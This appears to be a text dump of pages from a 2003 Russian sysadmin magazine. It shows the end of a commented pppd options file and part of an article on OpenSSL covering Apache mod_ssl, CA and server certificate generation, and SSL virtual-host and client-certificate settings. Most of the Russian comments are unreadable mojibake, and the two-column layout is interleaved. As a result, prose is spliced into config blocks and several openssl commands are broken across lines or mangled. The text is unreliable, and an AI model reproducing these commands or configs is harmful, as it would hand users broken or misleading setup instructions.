# Íå òðåáîâàòü èëè íå ðàçðåøàòü
# äîãîâàðèâàòüñÿ î ëþáûõ îïöèÿõ LCP
# è IPCP (èñïîëüçîâàòü çíà÷åíèÿ
# ïî óìîë÷àíèþ).
#-all
# Çàïðåòèòü äîãîâàðèâàòüñÿ î ñæàòèè
# àäðåñà/óïðàâëåíèÿ (èñïîëüçóåòñÿ
# ïî óìîë÷àíèþ, ò.å. àäðåñíûå/
# óïðàâëÿþùèå ïîëÿ çàïðåùåíû).
#-ac
# Çàïðåòèòü äîãîâàðèâàòüñÿ î asyncmap
# (èñïîëüçóåòñÿ asyncmap ïî óìîë÷àíèþ,
# ò.å. escape âñå óïðàâëÿþùèå
# ñèìâîëû).
#-am
# Íå ïåðåõîäèòü â ôîíîâûé ðåæèì
# (èíà÷å pppd áóäåò äåëàòü òàê, åñëè
# ïîñëåäîâàòåëüíîå óñòðîéñòâî
# óêàçàíî).
#-detach
# Çàïðåòèòü äîãîâàðèâàòüñÿ îá IP-àä-
# ðåñå (Ñ ýòîé îïöèåé óäàëåííûé IP-
# àäðåñ äîëæåí óêàçûâàòüñÿ îïöèåé êî-
# ìàíäíîé ñòðîêè èëè â ôàéëå options).
#-ip
# Çàïðåòèòü äîãîâàðèâàòüñÿ î
# ìàãè÷åñêèõ ÷èñëàõ. Ñ ýòîé îïöèåé
# pppd íå ìîæåò îïðåäåëèòü
# looped-back ëèíèþ.
#-mn
# Çàïðåòèòü äîãîâàðèâàòüñÿ î MRU
# [Maximum Receive Unit]
# (èñïîëüçóåòñÿ ïî óìîë÷àíèþ,
# ò.å. 1500).
#-mru
# Çàïðåòèòü äîãîâàðèâàòüñÿ î ñæàòèè
# ïîëåé ïðîòîêîëà (èñïîëüçóåòñÿ ïî
# óìîë÷àíèþ, ò.å. ñæàòèå ïîëåé
# ïðîòîêîëà çàïðåùåíî).
#-pc
# Òðåáóåò, ÷òîáû äðóãàÿ ñòîðîíà
# íàçâàëà ñåáÿ, èñïîëüçóÿ PAP.
# Ýòî òðåáóåò ÄÂÓÍÀÏÐÀÂËÅÍÍÎÉ
# àóòåíòèôèêàöèè - ÍÅ èñïîëüçóéòå ýòó
# îïöèþ äëÿ ñòàíäàðòíîé àóòåíòèôèêàöèè
# PAP íà ISP, òàê êàê ïðè ýòîì
# òðåáóåòñÿ, ÷òîáû ìàøèíà ISP
# àóòåíòèôèöèðîâàëà ñåáÿ íà âàøåé
# ìàøèíå (à îíà ýòî íå ñìîæåò
# ñäåëàòü).
#+pap
# Íå ñîãëàøàòüñÿ ñ àóòåíòèôèêàöèåé PAP.
#-pap
# Òðåáóåò, ÷òîáû äðóãàÿ ñòîðîíà
# íàçâàëà ñåáÿ, èñïîëüçóÿ CHAP
# [Cryptographic Handshake
# Authentication Protocol].
# Ýòî òðåáóåò ÄÂÓÍÀÏÐÀÂËÅÍÍÎÉ
# àóòåíòèôèêàöèè - ÍÅ èñïîëüçóéòå ýòó
# îïöèþ äëÿ ñòàíäàðòíîé àóòåíòèôèêàöèè
# CHAP íà ISP, òàê êàê ïðè ýòîì
# òðåáóåòñÿ, ÷òîáû ìàøèíà ISP
# àóòåíòèôèöèðîâàëà ñåáÿ íà âàøåé
# ìàøèíå (à îíà ýòî íå ñìîæåò ñäåëàòü)
#+chap
# Íå ñîãëàøàòüñÿ ñ àóòåíòèôèêàöèåé CHAP.
#-chap
# Çàïðåòèòü îáñóæäåíèå ñæàòèÿ
# IP-çàãîëîâêîâ â ñòèëå Van Jacobson
# (èñïîëüçóåòñÿ ïî óìîë÷àíèþ, ò.å.
# ñæàòèÿ íåò)
#-vj
# Óâåëè÷èòü óðîâåíü îòëàäêè (òî æå
# ÷òî -d). Åñëè ýòà îïöèÿ åñòü, pppd
# áóäåò çàïèñûâàòü â æóðíàë âñå
# ïðèáûâøèå è îòïðàâëåííûå ïàêåòû â
# ÷èòàáåëüíîé ôîðìå. Ïàêåòû
# ðåãèñòðèðóþòñÿ â ëîã-ôàéëàõ ÷åðåç
# syslog ñî ñðåäñòâîì daemon è óðîâíåì
# îòëàäêè. Ýòà èíôîðìàöèÿ ìîæåò áûòü
# ïåðåíàïðàâëåíà â ôàéë
# ñîîòâåòñòâóþùåé óñòàíîâêîé
# /etc/syslog.conf
# (ñì. syslog.conf(5)).
# (Åñëè pppd ñêîìïèëèðîâàí ñ
# ðàçðåøåííîé extra îòëàäêîé, îí áóäåò
# çàïèñûâàòü ñîîáùåíèÿ â æóðíàë,
# èñïîëüçóÿ ñðåäñòâî local2 âìåñòî
# daemon).
#debug
# Äîáàâèòü èìÿ äîìåíà <d> ê ëîêàëüíîìó
# èìåíè õîñòà äëÿ öåëåé
# àóòåíòèôèêàöèè. Íàïðèìåð, åñëè
# gethostname() âîçâðàùàåò èìÿ
# porsche, íî FQDN – porsche.Quotron.COM,
# òî âû äîëæíû óñòàíîâèòü ýòó îïöèþ,
# ÷òîáû èìÿ äîìåíà áûëî Quotron.COM.
#domain <d>
# Ðàçðåøèòü îòëàäî÷íûé êîä â PPP-
# äðàéâåðå íà óðîâíå ÿäðà. Àðãóìåíò
# n – ýòî ÷èñëî, êîìáèíàöèÿ ñëåäóþùèõ
# çíà÷åíèé: 1 – ðàçðåøèòü îáùèå
# îòëàäî÷íûå ñîîáùåíèÿ, 2 –
# çàïðîñèòü, íàäî ëè ïå÷àòàòü
# ñîäåðæèìîå ïðèíèìàåìûõ ïàêåòîâ
# è 4 – çàïðîñèòü, íàäî ëè ïå÷àòàòü
# ñîäåðæèìîå îòïðàâëÿåìûõ ïàêåòîâ.

#kdebug n
# Óñòàíîâòü çíà÷åíèå MTU [Maximum
# Transmit Unit] â <n>. Ïîêà äðóãàÿ
# ñòîðîíà íå ïîïðîñèò ìåíüøåå çíà÷åíèå
# ïðè äîãîâîðå î MRU, pppd áóäåò
# òðåáîâàòü ó ñåòåâîãî êîäà ÿäðà
# îòïðàâëÿòü ïàêåòû äàííûõ íå áîëåå
# ÷åì ïî n áàéò ÷åðåç ñåòåâîé
# èíòåðôåéñ PPP.
#mtu <n>
# Óñòàíîâèòü èìÿ ëîêàëüíîé ñèñòåìû
# äëÿ àóòåíòèôèêàöèîííûõ öåëåé â <n>.
# Âîçìîæíî, åå íàäî áóäåò óñòàíîâèòü
# â âàøå èìÿ íà âàøåì ISP, åñëè
# èñïîëüçóåòñÿ PAP/CHAP.
#name <n>
# Óñòàíîâèòü èìÿ ïîëüçîâàòåëÿ äëÿ
# àóòåíòèôèêàöèè ýòîé ìàøèíû íà
# äðóãîé ñòîðîíå èñïîëüçóÿ PAP,
# â çíà÷åíèå <n>. ÍÅ èñïîëüçîâàòü,
# åñëè âû èñïîëüçîâàëè îïöèþ 'name'!
#user <n>
# Çàñòàâèòü èñïîëüçîâàòü èìÿ õîñòà
# êàê èìÿ ëîêàëüíîé ñèñòåìû äëÿ
# àóòåíòèôèêàöèîííûõ öåëåé
# (ïåðåêðûâàåò îïöèþ name).
#usehostname
# Óñòàíîâèòü èìÿ óäàëåííîé ñèñòåìû
# äëÿ àóòåíòèôèêàöèîííûõ öåëåé â <n>.
#remotename <n>
# Äîáàâèòü çàïèñü äëÿ ýòîé ñèñòåìû â
# òàáëèöó ARP [Address Resolution
# Protocol] ñ IP-àäðåñîì óäàëåííîé
# ñèñòåìû è Ethernet àäðåñîì ýòîé
# ñèñòåìû.
#proxyarp
# Èñïîëüçîâàòü áàçó äàííûõ ïàðîëåé
# äëÿ èäåíòèôèêàöèè óäàëåííîé ñòîðîíû,
# èñïîëüçóÿ PAP.
#login
# Åñëè ýòà îïöèÿ íàçíà÷åíà, pppd áóäåò
# îòïðàâëÿòü êàäð LCP echo-request
# óäàëåííîé ñòîðîíå êàæäûå n ñåêóíä.
# Ïîä Linux, echo-request îòïðàâëÿ-
# åòñÿ, êîãäà ïàêåòû íå ïðèíèìàþòñÿ îò
# óäàëåííîé ñòîðîíû n ñåêóíä. Îáû÷íî
№2(3), февраль 2003
# óäàëåííàÿ ñòîðîíà äîëæíà îòâå÷àòü
# íà echo-request îòïðàâêîé echo-reply.
# Ýòà îïöèÿ ìîæåò áûòü èñïîëüçîâàíà ñ
# îïöèåé lcp-echo-failure äëÿ
# îïðåäåëåíèÿ ÷òî óäàëåííàÿ ñòîðîíà
# áîëüøå íå ñîåäèíåíà.
#lcp-echo-interval <n>
# Åñëè ýòà îïöèÿ çàäàíà, pppd áóäåò
# ñ÷èòàòü, ÷òî ñâÿçè ñ peer íåò, åñëè n
# LCP echo-requests îòïðàâëåíû áåç
# ïðèåìà ïðàâèëüíûõ LCP echo-reply.
# Åñëè ýòî ñëó÷èëîñü, pppd çàâåðøèò
# ñâÿçü. Èñïîëüçîâàíèå ýòîé îïöèè
# òðåáóåò íåíóëåâîãî çíà÷åíèÿ äëÿ
# ïàðàìåòðà lcp-echo-interval.
# Ýòà îïöèÿ ìîæåò áûòü èñïîëüçîâàíà,
# ÷òîáû ðàçðåøèòü pppd çàâåðøàòü ñâÿçü,
# åñëè ôèçè÷åñêîå ñîåäèíåíèå îòñóòñòâóåò
# (íàïð, ìîäåì áðîñèë òðóáêó) â
# ñèòóàöèÿõ, êîãäà äîñòóïíû ëèíèè
# óïðàâëåíèÿ ìîäåìîì.
#lcp-echo-failure <n>
# Óñòàíîâèòü èíòåðâàë ðåñòàðòà LCP
# (ïàóçà âîçîáíîâëåíèÿ ïåðåäà÷è) â
# <n> ñåêóíä (ïî óìîë÷àíèþ – 3).
#lcp-restart <n>
# Óñòàíîâèòü ìàêñèìàëüíîå ÷èñëî
# ïåðåäà÷ LCP terminate-request â <n>
# (ïî óìîë÷àíèþ – 3).
#lcp-max-terminate <n>
# Óñòàíîâèòü ìàêñèìàëüíîå ÷èñëî
# ïåðåäà÷ LCP configure-request â <n>
# (ïî óìîë÷àíèþ – 10). Íåêîòîðûå PPP-
# ñåðâåðà äîëãî ñòàðòóþò. Âàì ìîæåò
# ïîíàäîáèòüñÿ óâåëè÷èòü ýòó âåëè÷èíó,
# åñëè âû ïîëó÷àåòå îøèáêè 'serial
# line looped back' è âû ÓÂÅÐÅÍÛ,
# ÷òî êîððåêòíî ðåãèñòðèðóåòåñü è PPP
# äîëæåí çàïóñêàòüñÿ íà ñåðâåðå.
#lcp-max-configure <n>
# Óñòàíîâèòü ìàêñèìàëüíîå ÷èñëî LCP
# configure-NAKs, âîçâðàùåííûõ ïåðåä
# íà÷àëîì îòïðàâêè âìåñòî configure-
# Rejects, â <n> (ïî óìîë÷àíèþ – 10).
#lcp-max-failure <n>
# Óñòàíîâèòü èíòåðâàë ðåñòàðòà IPCP
# (ïàóçà âîçîáíîâëåíèÿ ïåðåäà÷è) â <n>
# ñåêóíä (ïî óìîë÷àíèþ – 3).
администрирование
#ipcp-restart <n>
# Óñòàíîâèòü ìàêñèìàëüíîå ÷èñëî
# ïåðåäà÷ IPCP terminate-request â <n>
# (ïî óìîë÷àíèþ – 3).
#ipcp-max-terminate <n>
# Óñòàíîâèòü ìàêñèìàëüíîå ÷èñëî
# ïåðåäà÷ IPCP configure-request â <n>
# (ïî óìîë÷àíèþ – 10).
#ipcp-max-configure <n>
# Óñòàíîâèòü ìàêñèìàëüíîå ÷èñëî IPCP
# configure-NAKs, âîçâðàùåííûõ ïåðåä
# íà÷àëîì îòïðàâêè âìåñòî configure-
# Rejects, â <n> (ïî óìîë÷àíèþ – 10).
#ipcp-max-failure <n>
# Óñòàíîâèòü èíòåðâàë ðåñòàðòà PAP
# (ïàóçà âîçîáíîâëåíèÿ ïåðåäà÷è) â <n>
# ñåêóíä (ïî óìîë÷àíèþ – 3).
#pap-restart <n>
# Óñòàíîâèòü ìàêñèìàëüíîå ÷èñëî
# ïåðåäà÷ PAP authenticate-request â
# <n> (ïî óìîë÷àíèþ – 10).
#pap-max-authreq <n>
# Óñòàíîâèòü èíòåðâàë ðåñòàðòà CHAP
# (ïàóçà âîçîáíîâëåíèÿ ïåðåäà÷
# challenges) â <n> ñåêóíä
# (ïî óìîë÷àíèþ – 3).
#chap-restart <n>
# Óñòàíîâèòü ìàêñèìàëüíîå ÷èñëî
# ïåðåäà÷ CHAP challenge â <n>
# (ïî óìîë÷àíèþ – 10).
#chap-max-challenge
# Ñ ýòîé îïöèåé pppd áóäåò re-challenge
# óäàëåííóþ ñòîðîíó êàæäûå <n> ñåêóíä.
#chap-interval <n>
# Ñ ýòîé îïöèåé pppd áóäåò ïðèíèìàòü
# ïðåäëîæåíèå peer î íàøåì ëîêàëüíîì
# IP-àäðåñå, äàæå åñëè ëîêàëüíûé
# IP-àäðåñ áûë óêàçàí â îïöèÿõ.
#ipcp-accept-local
# Ñ ýòîé îïöèåé pppd áóäåò ïðèíèìàòü
# ïðåäëîæåíèå peer î åãî (óäàëåííîì)
# IP-àäðåñå, äàæå åñëè óäàëåííûé
# IP-àäðåñ áûë óêàçàí â îïöèÿõ.
#ipcp-accept-remote
#EOF
31
 администрирование

ПРАКТИКА O PEN SSL

ВСЕВОЛОД СТАХОВ

OpenSSL применяется во множестве сетевых серверов. ты через ssl в локальной сети обычно используются self-
В данной статье я бы хотел рассказать о работе с ssl апа- signed сертификаты, что естественно. Сертификат серве-
ча, постфикса и курьера. Соответственно происходит ра обычно подписывается сертификатом организации.
шифрация трафика http-, smtp- и imap(pop3)-протоколов. Итак, сгенерируем секретный ключ RSA и self-signed
При использовании шифрации ssl обычно меняется порт, сертификат организации:
чтобы клиент мог корректно определить использование
безопасного соединения. Для начала я расскажу об ис- dd if=/dev/urandom of=/etc/openssl/.rnd -count 64
openssl genrsa -rand /etc/openssl/.rnd -des3 -out /etc/
пользовании ssl в апаче. openssl/org.key
Апач может работать с ssl через модуль mod_ssl, кото- openssl req -new -key /etc/openssl/org.key -config \
/etc/openssl/org.cnf -out /etc/openssl/
рый может быть скачан с www.apache-ssl.org. Для компи- org.csr
ляции апача с данным модулем выполняем следующее: openssl x509 -req -signkey /etc/openssl/org.key -in /etc/
openssl/org.csr \
-extfile /etc/openssl/org.cnf -out /etc/openssl/
$ cd /usr/src/apache_1.3.x/src org.crt -days 365
$ SSL_BASE=/usr/src/mod_ssl/ ./configure — ... –enable-
module=ssl
Пример конфига сертификата организации (CA-серти-
После успешной компиляции необходимо получить сер- фикат, поэтому определяем некоторые расширения, ко-
тификат организации. Тут есть два пути: первый – это со- торые указываем программе x509):
здать self-signed сертификат, второй – получить сертифи-
кат от trusted root CA. Скорее всего, второй вариант будет [ req ]
default_bits = 1024
небесплатный, например, на www.thawte.com предлагают distinguished_name = req_DN
продать сертификат www-сервера за 160$ сроком действия RANDFILE = ca.rnd
extensions = v3_req
на год. С другой стороны, такой способ обеспечивает пол- [ req_DN ]
ную безопасность клиента, т.к. он будет знать, что серти- countryName = "1. Country Name
(2 letter code)"
фикат действителен. Обычно у браузеров есть набор trusted countryName_default = RU
root CA, и когда браузер получает сертификат, подписан- countryName_min = 2
countryName_max = 2
ный одним из trusted ca, то он может корректно проверить stateOrProvinceName = "2. State or Province
подпись и решить на её основании о действительности сер- Name
(full name)"
тификата www-сервера. Если же браузер получает self- stateOrProvinceName_default = region
signed сертификат, то он спрашивает у пользователя, мож- localityName = "3. Locality Name
(eg, city)"
но ли доверять этому сертификату, т.к. в этом случае кли- localityName_default = city
ент не может точно определить, откуда к нему пришёл этот 0.organizationName = "4. Organization Name
(eg, company)"
сертификат и не может проверить его подпись, т.к. она не 0.organizationName_default = organization
входит в его trusted root CA. В качестве альтернативного organizationalUnitName = "5. Organizational Unit
Name (eg, section)"
варианта, если вы работаете с несколькими крупными кли- organizationalUnitName_default = Certificate Authority
ентами, можно посоветовать принести каждому клиенту commonName = "6. Common Name
(eg, CA name) "
свой сертификат (например, на дискетке или компакте) и commonName_max = 64
вручную добавить его в trusted root CA клиента. Для рабо- commonName_default = ""

32
 администрирование
emailAddress = "7. Email Address # Ñëóøàåì íà ïîðòó 443(https).
Listen 443
(eg,cert@organization.ru)" # Îïðåäåëÿåì ñïîñîá çàïðîñà ïàðîëÿ ê ñåêðåòíîìó êëþ÷ó
emailAddress_max = 40 # ñåðâåðà êàê built-in, èëè ìîæíî îïðåäåëèòü ïóòü ê
emailAddress_default = "" # âíåøíåìó ñêðèïòó, íî â áîëüøèíñòâå ñëó÷àåâ äîñòàòî÷íî
[ v3_req ] # built-in-ìåòîäà.
subjectAltName = email:copy SSLPassPhraseDialog builtin
basicConstraints = CA:true # Îïðåäåëÿåì êåøèðîâàíèå äàííûõ ssl â ôàéëå äàííûõ
nsComment = "CA certificate of # (none äëÿ îòêëþ÷åíèÿ êåøèðîâàíèÿ) è òàéìàóò îáíîâëåíèÿ
our organization" # äàííûõ â êåøå. Ìîæíî èñïîëüçîâàòü ïðè óêàçàíèè ôàéëà
nsCertType = sslCA # êåøà ñïåöèàëüíûé ôîðìàò shm (shm:/path/file [size]),
# êîòîðûé îáåñïå÷èâàåò âûñîêóþ ïðîèçâîäèòåëüíîñòü è
Теперь создаём сертификат сервера: # ðàáîòàåò ÷åðåç ìåõàíèçì shared memory.
SSLSessionCache dbm:logs/ssl_scache
#SSLSessionCache none
dd if=/dev/urandom of=/etc/openssl/.rnd count=64 SSLSessionCacheTimeout 300
openssl genrsa -rand /etc/openssl/.rnd -out /etc/openssl/ # Íàñòðàèâàåì ãåíåðàòîð ñëó÷àéíûõ ÷èñåë, óêàçûâàåì ìåòîä
httpd.key # äëÿ ðàíäîìèçàöèè. Óêàçûâàåòñÿ äâà èñòî÷íèêà ðàíäîìèçàöèè:
openssl req -new -key /etc/openssl/httpd.key -config / # íà÷àëüíûé (startup) è èíèöèàëèçèðóþùèéñÿ ïðè ïðèñîåäèíåíèè
etc/openssl/httpd.cnf \ # êëèåíòà (connect). Âîçìîæíûå çíà÷åíèÿ äëÿ ýòîãî ïàðàìåòðà:
-out /etc/openssl/httpd.csr # builtin – âñòðîåííûé èñòî÷íèê ðàíäîìèçàöèè,
# file:èìÿ_ôàéëà – ÷èòàþòñÿ äàííûå èç ôàéëà,
# file:èìÿ_ôàéëà ÷èñëî_áàéò – ÷èòàåòñÿ òîëüêî îïðåäåë¸ííîå
И подписываем его сертификатом организации: # ÷èñëî áàéò èç ôàéëà (ïîëåçíî äëÿ /dev/random
# è /dev/urandom)
SSLRandomSeed startup file:/dev/random 512
openssl x509 -req -signkey /etc/openssl/org.key -CA /etc/ SSLRandomSeed connect file:/dev/random 512
openssl/org.crt \ #SSLRandomSeed startup builtin
-extfile /etc/openssl/httpd.conf -out /etc/ #SSLRandomSeed connect builtin
openssl/httpd.crt \ #SSLRandomSeed startup file:/dev/urandom 512
-days 365 #SSLRandomSeed connect file:/dev/urandom 512
# Íàñòðàèâàåì ëîãè ssl. Óêàçûâàåì ôàéë è óðîâåíü çàïèñè
# â ëîã, âîçìîæíûå çíà÷åíèÿ óðîâíÿ ïî âîçðàñòàþùåìó ÷èñëó
Опять же здесь нужны расширения для серверного сер- # ðåãèñòðèðóåìûõ äàííûõ: none, error, warn, info, trace,
# debug.
тификата, ещё учтите, что лучше задавать CN серверно- SSLLog logs/ssl_engine_log
го сертификата как имя сервера: SSLLogLevel info

extensions = v3_req После настройки самого апача обычно приступают к

[ v3_req ]
basicConstraints = CA:false
nsComment = "Apache server certificate"
nsCertType = server
И ещё одна тонкость: при создании секретного ключа
сервера его лучше не шифровать. Хотя если это необхо-
димо в соображениях безопасности, то можно и зашиф-
ровать, но при этом апач при запуске будет спрашивать
пароль секретного ключа сервера (на экране при этом ни-
чего отображаться не будет, поэтому если вы долго ждё-
те запуска апача при включенном ssl и зашифрованном
ключе, попробуйте ввести пароль).
После генерации сертификата начинаем настройку
апача. Имеет смысл при использовании ssl создать от-
дельный файл конфигурации, который будет описывать
параметры ssl. Также обычно создаётся виртуальный
сервер ssl, который висит на 443 порту (https), в отличие
от стандартных виртуальных серверов, ssl-сервер дол-
жен однозначно соответствовать паре IP-адрес : порт (т.е.
на один IP-адрес и порт можно повесить только один ssl-
виртуальный сервер). Для начала включим ssl-модуль в
апаче. После этого все настройки ssl полезно окружить
условием <IfModule mod_ssl.c></IfModule>:
httpd.conf
# Çàãðóæàåì ìîäóëü ssl (îí ìîæåò íàõîäèòüñÿ â modules èëè
# extramodules). Ó÷òèòå, åñëè âû èñïîëüçóåòå ìîäóëü mod_php,
# òî åãî íåîáõîäèìî äîáàâèòü ÏÎÑËÅ ìîäóëÿ ssl, èíà÷å
# ïîñëåäñòâèÿ ìîãóò áûòü ïå÷àëüíû (core dumpted).
LoadModule ssl_module modules/libssl.so
AddModule mod_ssl.c
# Äîáàâëÿåì íåêîòîðûå MIME-òèïû.
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl .crl
AddType application/x-pkcs12-cert .p12
настройке виртуального ssl-сервера. Обычно основной
сервер оставляют висеть на 80 порту, а на главной стра-
нице размещают ссылку на переход в безопасный режим
(или ставят редирект, но это уж дело вкуса или политики
безопасности).
vhosts.conf
<IfModule mod_ssl.c>
# Îïðåäåëÿåì âèðòóàëüíûé ñåðâåð, âèñÿùèé íà òîì æå
# IP-àäðåñå, ÷òî è îñíîâíîé, íî ñëóøàþùèé íà 443 ïîðòó.
<VirtualHost _default_:443>
# Îñíîâíûå íàñòðîéêè âèðòóàëüíîãî ñåðâåðà.
DocumentRoot /var/www/html
ServerName www.test.ru
ServerAdmin admin@test.ru
ErrorLog logs/ssl-error_log
TransferLog logs/ssl-access_log
# Ñëåäóþùàÿ äèðåêòèâà âêëþ÷àåò ssl äëÿ äàííîãî
# âèðòóàëüíîãî ñåðâåðà.
SSLEngine on
# Ñïèñîê äîñòóïíûõ àëãîðèòìîâ øèôðîâàíèÿ. Ôîðìàò ñïèñêà
# òàêîé æå, êàê è ó êîìàíäû openssl ciphers (MEDIUM, HIGH,
# NULL, ýëåìåíòû ðàçäåëÿþòñÿ :, èñêëþ÷åíèå ýëåìåíòà
# îñóùåñòâëÿåòñÿ çíàêîì !).
SSLCipherSuite HIGH:MEDIUM
# Ñåðòèôèêàò ñåðâåðà. Äàííûé ñåðòèôèêàò äîëæåí áûòü â
# ôîðìàòå pem.
SSLCertificateFile /etc/openssl/httpd.crt
# Ñåêðåòíûé êëþ÷ ñåðâåðà, êîòîðûì îí áóäåò ðàñøèôðîâûâàòü
# äàííûå êëèåíòà. Åñëè êëþ÷ çàøèôðîâàí, òî ïðè çàïóñêå
# àïà÷à áóäåò ñïðàøèâàòüñÿ ïàðîëü, êàê îïðåäåëåíî
# â îïöèè SSLPassPhraseDialog.
SSLCertificateKeyFile /etc/openssl/httpd.key
# Ñëåäóþùèå äèðåêòèâû îïèñûâàþò CA-ñåðòèôèêàòû. Åñëè óêàçàí
# ïàðàìåòð SSLCACertificatePath, òî CA-ñåðòèôèêàòû
# çàãðóæàþòñÿ èç óêàçàííîãî êàòàëîãà (â ýòîì êàòàëîãå äîëæíû
# òàêæå ðàçìåùàòüñÿ ñèìâîëè÷åñêèå ññûëêè ñ èìåíåì
# hash-value.N, ïðè äîáàâëåíèè íîâîãî ôàéëà ñåðòèôèêàòà
# â äàííûé êàòàëîã íåîáõîäèìî âîñïîëüçîâàòüñÿ ñïåöèàëüíûì

№2(3), февраль 2003 33

администрирование
# makefile, èäóùèì âìåñòå ñ ìîäóëåì). Åñëè óêàçàí ïàðàìåòð
# SSLCACertificateFile, òî âñå ÑÀ-ñåðòèôèêàòû õðàíÿòñÿ
# â îäíîì pem-ôàéëå (ñåðòèôèêàòû ïðîñòî çàïèñûâàþòñÿ îäèí
# çà äðóãèì â äàííûé ôàéë áåç âñÿêèõ ðàçäåëèòåòëåé,
# ò.ê. ëþáîé ñåðòèôèêàò èìååò ìàðêåð íà÷àëà è êîíöà)
#SSLCACertificatePath @@ServerRoot@@/conf/ssl/ssl.crt
SSLCACertificateFile /etc/openssl/org.crt
# Ñïèñîê ñåðòèôèêàòîâ, êîòîðûå ñ÷èòàþòñÿ
# íåäåéñòâèòåëüíûìè (certificate revocation list - CRL)
# ïî íåêèì ïðè÷èíàì: ïî ïðîèñøåñòâèè ñðîêà äåéñòâèÿ,
# ïî ïîòåðå ñåêðåòíîãî êëþ÷à è.ò.ä. Ýòî ïîíÿòèå òðåáóåò
# íåêîòîðîãî îáúÿñíåíèÿ, ïîýòîìó ïîñëå äàííîãî ïðèìåðà
# ÿ ðàññêàæó (íåñêîëüêî çàïîçäàëî) î ñîçäàíèè òàêîãî ñïèñêà.
# Ñèíòàêñèñ ýòèõ ïàðìåòðîâ àíàëîãè÷åí ïðåäûäóùèì
#SSLCARevocationPath @@ServerRoot@@/conf/ssl/ssl.crl
SSLCARevocationFile /etc/openssl/ssl.crl
# Àóòåíòèôèêàöèÿ êëèåíòà íà îñíîâàíèè åãî ñåðòèôèêàòà,
# âûäàííîãî CA (ñì. îïöèþ SSLCACertificate). Â ãëîáàëüíîé
# êîíôèãóðàöèè ÿ óñòàíîâèë ýòó îïöèþ â none, íî ýòà îïöèÿ
# ìîæåò áûòü ïåðåîïðåäåëåíà â êîíêðåòíîé <Directory>
# èëè <Location>, êàê è ñäåëàíî â äàííîì ïðèìåðå
# SSLVerifyClient none. Òåïåðü îïðåäåëèì íåêèé ðàçäåë,
# äîñòóï â êîòîðûé ïðåäîñòàâèì òîëüêî ñîòðóäíèêàì
# îïðåäåë¸ííûõ îòäåëîâ. Êëèåíò äîëæåí áóäåò ïîñëàòü ñâîé
# ñåðòèôèêàò, êîòîðûé ïîäïèñàí îäíèì èç CA-ñåðòèôèêàòîâ.
<Location /secure>
# Òðåáóåì îò êëèåíòà ïîñûëêè ñâîåãî ñåðòèôèêàòà äëÿ
# âûïîëíåíèÿ àóòåíòèôèêàöèè.
SSLVerifyClient require
# ×èñëî øàãîâ îò ñåðòèôèêàòà êëèåíòà äî CA-ñåðòèôèêàòà
# â èåðàðõèè ñåðòèôèêàòîâ.
SSLVerifyDepth 5
# Ïðîâåðêà ñåðòèôèêàòà êëèåíòà. Äëÿ íà÷àëà íåîáõîäèìî,
# ÷òîáû ñåðòèôèêàò êëèåíòà áûë ïîäïèñàí îäíèì èç CA-
# ñåðòèôèêàòîâ, òîãäà ñåðâåð ìîæåò áûòü óâåðåí, ÷òî
# ñåðòèôèêàò êëèåíòà ÿâëÿåòñÿ äåéñòâèòåëüíûì, êðîìå ýòîãî,
# ïîëó÷åííûé ñåðòèôèêàò íå äîëæåí íàõîäèòüñÿ â ñïèñêå
# íåäåéñòâèòåëüíûõ (crl) ñåðòèôèêàòîâ. Ñèíòàêñèñ äàííîé
# êîìàíäû ñ ïåðâîãî âçãëÿäà ìîæåò ïîêàçàòüñÿ íåñêîëüêî
# ñëîæíûì, íî îí èñïîëüçóåò ðåãóëÿðíûå âûðàæåíèÿ, ïîäîáíûå
# ïåðëîâñêèì, è ëîãè÷åñêèå îïåðàòîðû (and, or, !).
#  êà÷åñòâå ïåðåìåííûõ ìîãóò èñïîëüçîâàòüñÿ êàê ñòàíäàðòíûå
# ïåðåìåííûå, âðîäå REMOTE_ADDR, TIME, òàê è ïåðåìåííûå
# ssl. Ñðåäè ïîñëåäíèõ íàèáîëåå ïîëåçíû ñëåäóþùèå:
# SSL_CIPHER, SSL_CLIENT_S_DN_(ïàðàìåòðû DN êëèåíòà,
# âðîäå O, OU, Ñ è.ò.ä.), SSL_CLIENT_I_DN_(ïàðàìåòðû
# DN ïîñòàâùèêà ñåðòèôèêàòà).
SSLRequire %{SSL_CIPHER} !~ m/^(EXP|NULL)-/ \
and %{SSL_CLIENT_S_DN_O} eq "organization" \
and %{SSL_CLIENT_S_DN_OU} in {"Sysopka", "CA",
"BigBosses"}
</Location>
# Îïðåäåëÿåì îïöèè ssl (îíè ìîãóò áûòü ïåðåîïðåäåëåíû â
# <Directory>):
# FakeBasicAuth:
# Äàííàÿ îïöèÿ ãîâîðèò àïà÷ó, ÷òî ìîæíî èñïîëüçîâàòü
# àóòåíòèôèêàöèþ íà îñíîâå ñåðòèôèêàòà, íî íàñòðîéêè
# ôèëüòðàöèè ñåðòèôèêàòà ëåæàò â ôàéëå .htpasswd,
# êîòîðûé âûãëÿäèò ïðèìåðíî ñëåäóþùèì îáðàçîì:
#/C=RU/L=city/O=organization/OU=sysopka
CN=admin:xxj31ZMTZzkVA
#/C=RU/L=city/O=organization/OU=bosses/
CN=my_boss:xxj31ZMTZzkVA
#/C=US/L=New York/O=Microsoft/OU=head/
CN=Billy:xxj31ZMTZzkVA
# Ãäå ñèìâîëû "xxj31ZMTZzkVA" – ýòî des-âàðèàíò ñëîâà
# password (íåîáõîäèìîå óñëîâèå), íà íåêîòîðûõ ñèñòåìàõ
# íóæíî çäåñü ïîñòàâèòü md5-õåø ýòîãî ñëîâà
#$1$OXLyS...$Owx8s2/m9/gfkcRVXzgoE/.
# ExportCertData:
# Äàííûé ïàðàìåòð óñòàíàâëèâàåò, ÷òî CGI-ñêðèïòàì áóäóò
# ïåðåäàâàòüñÿ ïåðåìåííûå SSL_SERVER_CERT (âñåãäà),
# SSL_CLIENT_CERT (åñëè êëèåíò ïîñëàë ñâîé ñåðòèôèêàò),
# êîòîðûå ñîäåðæàò ñåðòèôèêàòû ñåðâåðà è êëèåíòà
# ñîîòâåòñòâåííî â ôîðìàòå pem.
# StrictRequire:
# Ýòà îïöèÿ ïðèìåíÿåòñÿ ñîâìåñòíî ñ îïöèåé satisfy è
# îáåñïå÷èâàåò çàïðåò äîñòóïà êëèåíòà, åñëè åãî
# ñåðòèôèêàò íå ñîîòâåòñòâóåò RequireSSL
# OptRenegotiate:
# Äàííàÿ îïöèÿ ïðèìåíÿåòñÿ òîëüêî â ïàðàìåòðàõ <Directory>
# è çàñòàâëÿåò ssl çàíîâî èíèöèàëèçèðîâàòü ñîåäèíåíèå
# ñ êëèåíòîì
